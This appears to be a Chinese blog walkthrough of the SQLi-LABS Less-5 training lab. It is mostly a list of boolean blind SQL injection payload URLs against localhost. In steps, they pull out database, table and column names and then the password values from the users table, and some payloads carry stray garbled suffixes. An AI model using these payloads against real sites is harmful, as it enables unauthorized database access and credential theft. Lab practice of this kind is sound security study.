SQL布爾盲注-(針對SQLi-LABS Page-1(Basic Challenges)第五關)
庫操做
庫名長度
http://localhost/sqli/Less-5/?id=1'and (length(database())=10)--+sql
其餘庫長度
http://localhost/sqli/Less-5/?id=1'and (length((select schema_name from information_schema.schemata limit 0,1))=6)--+spa
求本庫名字符
http://localhost/sqli/Less-5/?id=1'and (ascii(substr(database(),1,1))>32)--+orm
求其餘庫名字符
http://localhost/sqli/Less-5/?id=1'and (ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))>32)--+ci
表操做
表長度
http://localhost/sqli/Less-5/?id=1'and (length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6)--+it
第二個表長度
http://localhost/sqli/Less-5/?id=1'and (length((select table_name from information_schema.tables where table_schema=database() limit 2,1))=6)--+io
第一個表名第一個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>32)--+table
第一個表名第二個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>32)--+form
第二個表名第一個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>32)--+select
第二個表名第二個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>32)--+im
字段操做
求字段長度
http://localhost/sqli/Less-5/?id=1'and(length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1))=2)--+
求第二個字段長度
http://localhost/sqli/Less-5/?id=1'and(length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1))=2)--+
求第一個字段第一個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>32)--+
求第一個字段第二個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>32)--+
求第二個字段第一個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),1,1))>32)--+
求第二個字段第二個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),2,1))>32)--+
數據操做
求第一個數據長度
http://localhost/sqli/Less-5/?id=1'and(length((select password from security.users limit 0,1))=32)--+
求第二個數據長度
http://localhost/sqli/Less-5/?id=1'and(length((select password from security.users limit 1,1))=32)--+
求第一個數據的第一個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select password from security.users limit 0,1),1,1))>32)--+
求第一個數據的第二個字符
http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select password from security.users limit 0,1),2,1))>32)--+
能夠根據以上信息總結公式進行改編套用。
- 1. SQL注入——布爾盲注
- 2. 3.1 SQL盲注- 布爾盲注
- 3. 盲注----基於布爾的SQL盲注
- 4. 布爾盲注
- 5. SQL盲注注入——布爾型
- 6. SQL注入之布爾型盲注
- 7. SQL注入——布爾盲注,時間盲注,寬字節注入
- 8. SQL盲注學習-布爾型
- 9. SQL注入實戰之盲注篇(布爾、時間盲注)
- 10. sqlmap注入(布爾盲注)
- 更多相關文章...
- • SQL ORDER BY 關鍵字 - SQL 教程
- • SQL INNER JOIN 關鍵字 - SQL 教程
- • NewSQL-TiDB相關
- • 算法總結-雙指針
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. SQL注入——布爾盲注
- 2. 3.1 SQL盲注- 布爾盲注
- 3. 盲注----基於布爾的SQL盲注
- 4. 布爾盲注
- 5. SQL盲注注入——布爾型
- 6. SQL注入之布爾型盲注
- 7. SQL注入——布爾盲注,時間盲注,寬字節注入
- 8. SQL盲注學習-布爾型
- 9. SQL注入實戰之盲注篇(布爾、時間盲注)
- 10. sqlmap注入(布爾盲注)